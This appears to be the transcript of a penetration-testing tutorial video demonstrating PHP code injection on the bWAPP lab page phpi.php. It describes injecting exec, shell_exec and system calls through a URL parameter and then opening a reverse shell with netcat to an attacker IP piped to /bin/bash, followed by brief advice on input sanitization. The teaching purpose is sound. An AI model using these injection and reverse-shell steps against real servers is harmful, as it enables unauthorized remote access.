Welcome back to a new video. In this video, we're going to be carrying on penetration testing series, and in this video, guys, we're going to be touching BWL again. For this video, guys, I am gonna go over PHP code injection, and you can visit the webpage of this challenge on pwapp/phpi.php. Okay, so basically the purpose of this exercise is to demonstrate how we can inject commands through a PHP file. Okay, so once you visit a page like that and you see a PHP file, right, phpi.php. So in order to demonstrate or to show how we can test for PHP command injection, we're going to need to view the source code of the page. So we right click on that and view page source. Okay, we go down. As we can see here, we have phpi.php, which is the file, and we have the parameter that is that we can assign value to, right? So we can perform specific actions on the page. So if we go back and we write here something like message equal test, as you can see, guys, we have the test has been displayed on the page as an output. So basically the parameter over here controls the output on the page. Now, what we can do here, guys, we can try to execute some commands on this. Execute some commands, guys, using this parameter, and we see if the page is vulnerable to PHP code injection. Now, what is PHP code injection, guys? PHP code injection is the kind of attack you perform on a PHP file like this one, guys, an application written in PHP where the parameters, in this case, it's message. Oh, I'm sorry, it's mosquito. In this case, it's message, right? And the parameter message, as you can see, guys, this parameter, we're going to assume that this parameter doesn't perform any kind of input sanitization. So basically here, the file, the PHP file in in a secure form, right? It's going to perform input validation using special characters, special functions. I'm going to show you guys what these functions are. For example, HTML special characters. This is one function written in PHP, guys, that performs this kind of input sanitization against all kind of bad characters like parentheses, single quotes, square parentheses, arrows, etc. So once we have this function in place, it's not so difficult to implement that. We're going to be able to make the PHP file and its parameters handle the user input in a safe way. But if there is no any kind of input validation or sanitization, all we end up with is PHP command injection. So basically here we can test this. For example, we can use the PHP function like execute, right? And we can type here, for example, who am I? Single quote, who am I? Of course, without the semicolon. And click enter. As you can see, guys, the command has been executed successfully. And the page has returned the current user or the web server user. So basically what happened here, guys, since there is no input sanitization against the parentheses and the single quotes, right, the command has been executed and it hasn't supposed to be executed actually. For example, another example of that is pwd, and we can view the current working directory, which is the web server current working directory. All right. How can we convert that into an actual meaningful attack? So basically, we go back to our shell, our command line, and over here, guys, we issue sudo nc netcut lvp, I put something like 3535 or 4545. We go back, and over here we put NC and the IP address of the attacker machine 192.168.1.7, I guess, and the port is 4545, and we then output the or we pipe the output of the connection to bin bash. We want bin bash, of course. All right, click enter. Nope. Ah, okay. I did enter. Again, as you can see, guys, we received connection from the testing machine, and we got reverse shell. So we click on ID, and the current user is the web server user. We display the output of the current working directory used pwd, and we have that. Of course, we can navigate through the file system. We go to home. This is the files. We have TUX, whatsoever, etc. Guys. We carry on or attack depending on the objective. Another way with that with this guide is to use something called shell execute. Let's re-establish the listener and try that. And we receive the connection again. Control X, try another way. We use system, for example. It's another way to execute commands through PHP. Re-establish the listener and go back. Again, we received reverse shell. So the flaw with this page, guys, is there is no any mechanism of controlling, validating, and checking on the user input, guys. So we should execute always the single quotes, the slashes, the dashes if possible, if there is no applicable use of dashes in your system. The parentheses, right? Of course, if you want to allow these kind of functions in your website to be executed by the user, you need also to control the type of commands that the user can execute, guys. All right, so basically that's it, and see you in the next video. Oh, sorry. Before I wrap up, guys, or I will close the video, don't forget to view how to mitigate these kind of attacks by viewing the videos I created for PHP and or in general PHP, HTML, JavaScript code review. I'm going to put these videos as cards, right? So you can click on them and access them directly.